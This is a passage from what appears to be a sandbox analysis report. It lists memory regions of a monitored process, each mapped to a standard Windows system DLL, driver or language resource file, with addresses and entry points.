start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2155 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2156 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2157 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2158 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2159 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2160 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2161 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2162 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2163 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2164 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2165 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2166 start_va = 0x410000 end_va = 0x469fff monitored = 0 entry_point = 0x455b00 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 2167 start_va = 0x470000 end_va = 0x473fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 2168 start_va = 0x410000 end_va = 0x469fff monitored = 0 entry_point = 0x455b00 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 2169 start_va = 0x470000 end_va = 0x473fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 2170 start_va = 0x410000 end_va = 0x410fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 2171 start_va = 0x13b0000 end_va = 0x1491fff monitored = 0 entry_point = 0x140d100 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 2172 start_va = 0x410000 end_va = 0x410fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 2173 start_va = 0x13b0000 end_va = 0x1491fff monitored = 0 entry_point = 0x140d100 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 2175 start_va = 0x410000 end_va = 0x438fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 2176 start_va = 0x13b0000 end_va = 0x1493fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 2177 start_va = 0x410000 end_va = 0x438fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 2178 start_va = 0x13b0000 end_va = 0x1493fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 2179 start_va = 0x410000 end_va = 0x415fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "afd.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\afd.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\afd.sys.mui") Region: id = 2180 start_va = 0x13b0000 end_va = 0x1442fff monitored = 0 entry_point = 0x1429000 region_type = mapped_file name = "afd.sys" filename = "\\Windows\\System32\\drivers\\afd.sys" (normalized: "c:\\windows\\system32\\drivers\\afd.sys") Region: id = 2181 start_va = 0x410000 end_va = 0x415fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "afd.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\afd.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\afd.sys.mui") Region: id = 2182 start_va = 0x13b0000 end_va = 0x1442fff monitored = 0 entry_point = 0x1429000 region_type = mapped_file name = "afd.sys" filename = "\\Windows\\System32\\drivers\\afd.sys" (normalized: "c:\\windows\\system32\\drivers\\afd.sys") Region: id = 2183 start_va = 0x410000 end_va = 0x415fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fvevol.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\fvevol.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\fvevol.sys.mui") Region: id = 2184 start_va = 0x13b0000 end_va = 0x1450fff monitored = 0 entry_point = 0x1443000 region_type = mapped_file name = "fvevol.sys" filename = "\\Windows\\System32\\drivers\\fvevol.sys" (normalized: "c:\\windows\\system32\\drivers\\fvevol.sys") Region: id = 2185 start_va = 0x410000 end_va = 0x415fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fvevol.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\fvevol.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\fvevol.sys.mui") Region: id = 2186 start_va = 0x13b0000 end_va = 0x1450fff monitored = 0 entry_point = 0x1443000 region_type = mapped_file name = "fvevol.sys" filename = "\\Windows\\System32\\drivers\\fvevol.sys" (normalized: "c:\\windows\\system32\\drivers\\fvevol.sys") Region: id = 2187 start_va = 0x410000 end_va = 0x41afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spaceport.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\spaceport.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\spaceport.sys.mui") Region: id = 2188 start_va = 0x13b0000 end_va = 0x1435fff monitored = 0 entry_point = 0x1421000 region_type = mapped_file name = "spaceport.sys" filename = "\\Windows\\System32\\drivers\\spaceport.sys" (normalized: "c:\\windows\\system32\\drivers\\spaceport.sys") Region: id = 2189 start_va = 0x410000 end_va = 0x41afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spaceport.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\spaceport.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\spaceport.sys.mui") Region: id = 2190 start_va = 0x13b0000 end_va = 0x1435fff monitored = 0 entry_point = 0x1421000 region_type = mapped_file name = "spaceport.sys" filename = "\\Windows\\System32\\drivers\\spaceport.sys" (normalized: "c:\\windows\\system32\\drivers\\spaceport.sys") Region: id = 2191 start_va = 0x410000 end_va = 0x41afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spaceport.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\spaceport.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\spaceport.sys.mui") Region: id = 2192 start_va = 0x13b0000 end_va = 0x1435fff monitored = 0 entry_point = 0x1421000 region_type = mapped_file name = "spaceport.sys" filename = "\\Windows\\System32\\drivers\\spaceport.sys" (normalized: "c:\\windows\\system32\\drivers\\spaceport.sys") Region: id = 2193 start_va = 0x410000 end_va = 0x41afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spaceport.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\spaceport.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\spaceport.sys.mui") Region: id = 2194 start_va = 0x13b0000 end_va = 0x1435fff monitored = 0 entry_point = 0x1421000 region_type = mapped_file name = "spaceport.sys" filename = "\\Windows\\System32\\drivers\\spaceport.sys" (normalized: "c:\\windows\\system32\\drivers\\spaceport.sys") Region: id = 2195 start_va = 0x410000 end_va = 0x415fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 2196 start_va = 0x13b0000 end_va = 0x1467fff monitored = 0 entry_point = 0x13b1d30 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 2197 start_va = 0x410000 end_va = 0x415fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 2198 start_va = 0x13b0000 end_va = 0x1467fff monitored = 0 entry_point = 0x13b1d30 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 2199 start_va = 0x410000 end_va = 0x415fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 2200 start_va = 0x13b0000 end_va = 0x1467fff monitored = 0 entry_point = 0x13b1d30 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 2201 start_va = 0x410000 end_va = 0x415fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 2202 start_va = 0x13b0000 end_va = 0x1467fff monitored = 0 entry_point = 0x13b1d30 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 2203 start_va = 0x410000 end_va = 0x41cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2204 start_va = 0x13b0000 end_va = 0x14a2fff monitored = 0 entry_point = 0x13d5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2205 start_va = 0x410000 end_va = 0x41cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2206 start_va = 0x13b0000 end_va = 0x14a2fff monitored = 0 entry_point = 0x13d5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2207 start_va = 0x410000 end_va = 0x41cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2208 start_va = 0x13b0000 end_va = 0x14a2fff monitored = 0 entry_point = 0x13d5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2209 start_va = 0x410000 end_va = 0x41cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2210 start_va = 0x13b0000 end_va = 0x14a2fff monitored = 0 entry_point = 0x13d5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2211 start_va = 0x410000 end_va = 0x41cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2212 start_va = 0x13b0000 end_va = 0x14a2fff monitored = 0 entry_point = 0x13d5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2213 start_va = 0x410000 end_va = 0x41cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2214 start_va = 0x13b0000 end_va = 0x14a2fff monitored = 0 entry_point = 0x13d5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2215 start_va = 0x410000 end_va = 0x41cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2216 start_va = 0x13b0000 end_va = 0x14a2fff monitored = 0 entry_point = 0x13d5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2217 start_va = 0x410000 end_va = 0x41cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2218 start_va = 0x13b0000 end_va = 0x14a2fff monitored = 0 entry_point = 0x13d5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2219 start_va = 0x410000 end_va = 0x41cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2220 start_va = 0x13b0000 end_va = 0x14a2fff monitored = 0 entry_point = 0x13d5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2221 start_va = 0x410000 end_va = 0x41cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2222 start_va = 0x13b0000 end_va = 0x14a2fff monitored = 0 entry_point = 0x13d5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2223 start_va = 0x410000 end_va = 0x41cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2224 start_va = 0x13b0000 end_va = 0x14a2fff monitored = 0 entry_point = 0x13d5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2225 start_va = 0x410000 end_va = 0x41cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 2226 start_va = 0x13b0000 end_va = 0x14a2fff monitored = 0 entry_point = 0x13d5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2227 start_va = 0x410000 end_va = 0x41efff monitored = 0 entry_point = 0x4136e0 region_type = mapped_file name = "dmvsc.sys" filename = "\\Windows\\System32\\drivers\\dmvsc.sys" (normalized: "c:\\windows\\system32\\drivers\\dmvsc.sys") Region: id = 2228 start_va = 0x420000 end_va = 0x421fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dmvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\dmvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\dmvsc.sys.mui") Region: id = 2229 start_va = 0x410000 end_va = 0x41efff monitored = 0 entry_point = 0x4136e0 region_type = mapped_file name = "dmvsc.sys" filename = "\\Windows\\System32\\drivers\\dmvsc.sys" (normalized: "c:\\windows\\system32\\drivers\\dmvsc.sys") Region: id = 2230 start_va = 0x420000 end_va = 0x421fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dmvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\dmvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\dmvsc.sys.mui") Region: id = 2231 start_va = 0x410000 end_va = 0x42afff monitored = 1 entry_point = 0x411190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 2232 start_va = 0x430000 end_va = 0x43bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 2233 start_va = 0x410000 end_va = 0x42afff monitored = 1 entry_point = 0x411190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 2234 start_va = 0x430000 end_va = 0x43bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 2235 start_va = 0x410000 end_va = 0x42afff monitored = 1 entry_point = 0x411190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 2236 start_va = 0x430000 end_va = 0x43bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 2237 start_va = 0x410000 end_va = 0x42afff monitored = 1 entry_point = 0x411190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 2238 start_va = 0x430000 end_va = 0x43bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 2239 start_va = 0x410000 end_va = 0x42afff monitored = 1 entry_point = 0x411190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 2240 start_va = 0x430000 end_va = 0x43bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 2241 start_va = 0x410000 end_va = 0x42afff monitored = 1 entry_point = 0x411190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 2242 start_va = 0x430000 end_va = 0x43bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 2243 start_va = 0x410000 end_va = 0x411fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 2244 start_va = 0x13b0000 end_va = 0x14befff monitored = 0 entry_point = 0x13ec010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 2245 start_va = 0x410000 end_va = 0x411fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 2246 start_va = 0x13b0000 end_va = 0x14befff monitored = 0 entry_point = 0x13ec010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 2247 start_va = 0x410000 end_va = 0x425fff monitored = 0 entry_point = 0x413630 region_type = mapped_file name = "umpoext.dll" filename = "\\Windows\\System32\\umpoext.dll" (normalized: "c:\\windows\\system32\\umpoext.dll") Region: id = 2248 start_va = 0x430000 end_va = 0x431fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpoext.dll.mui" filename = "\\Windows\\System32\\en-US\\umpoext.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpoext.dll.mui") Region: id = 2249 start_va = 0x410000 end_va = 0x425fff monitored = 0 entry_point = 0x413630 region_type = mapped_file name = "umpoext.dll" filename = "\\Windows\\System32\\umpoext.dll" (normalized: "c:\\windows\\system32\\umpoext.dll") Region: id = 2250 start_va = 0x430000 end_va = 0x431fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpoext.dll.mui" filename = "\\Windows\\System32\\en-US\\umpoext.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpoext.dll.mui") Region: id = 2251 start_va = 0x410000 end_va = 0x425fff monitored = 0 entry_point = 0x413630 region_type = mapped_file name = "umpoext.dll" filename = "\\Windows\\System32\\umpoext.dll" (normalized: "c:\\windows\\system32\\umpoext.dll") Region: id = 2252 start_va = 0x430000 end_va = 0x431fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpoext.dll.mui" filename = "\\Windows\\System32\\en-US\\umpoext.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpoext.dll.mui") Region: id = 2253 start_va = 0x410000 end_va = 0x425fff monitored = 0 entry_point = 0x413630 region_type = mapped_file name = "umpoext.dll" filename = "\\Windows\\System32\\umpoext.dll" (normalized: "c:\\windows\\system32\\umpoext.dll") Region: id = 2254 start_va = 0x430000 end_va = 0x431fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpoext.dll.mui" filename = "\\Windows\\System32\\en-US\\umpoext.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpoext.dll.mui") Region: id = 2255 start_va = 0x410000 end_va = 0x426fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tcpip.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\tcpip.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\tcpip.sys.mui") Region: id = 2256 start_va = 0x13b0000 end_va = 0x1606fff monitored = 0 entry_point = 0x15bce10 region_type = mapped_file name = "tcpip.sys" filename = "\\Windows\\System32\\drivers\\tcpip.sys" (normalized: "c:\\windows\\system32\\drivers\\tcpip.sys") Region: id = 2259 start_va = 0x410000 end_va = 0x426fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tcpip.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\tcpip.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\tcpip.sys.mui") Region: id = 2260 start_va = 0x13b0000 end_va = 0x1606fff monitored = 0 entry_point = 0x15bce10 region_type = mapped_file name = "tcpip.sys" filename = "\\Windows\\System32\\drivers\\tcpip.sys" (normalized: "c:\\windows\\system32\\drivers\\tcpip.sys") Region: id = 2261 start_va = 0x410000 end_va = 0x419fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 2262 start_va = 0x13b0000 end_va = 0x14c0fff monitored = 0 entry_point = 0x14a1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 2263 start_va = 0x410000 end_va = 0x419fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: 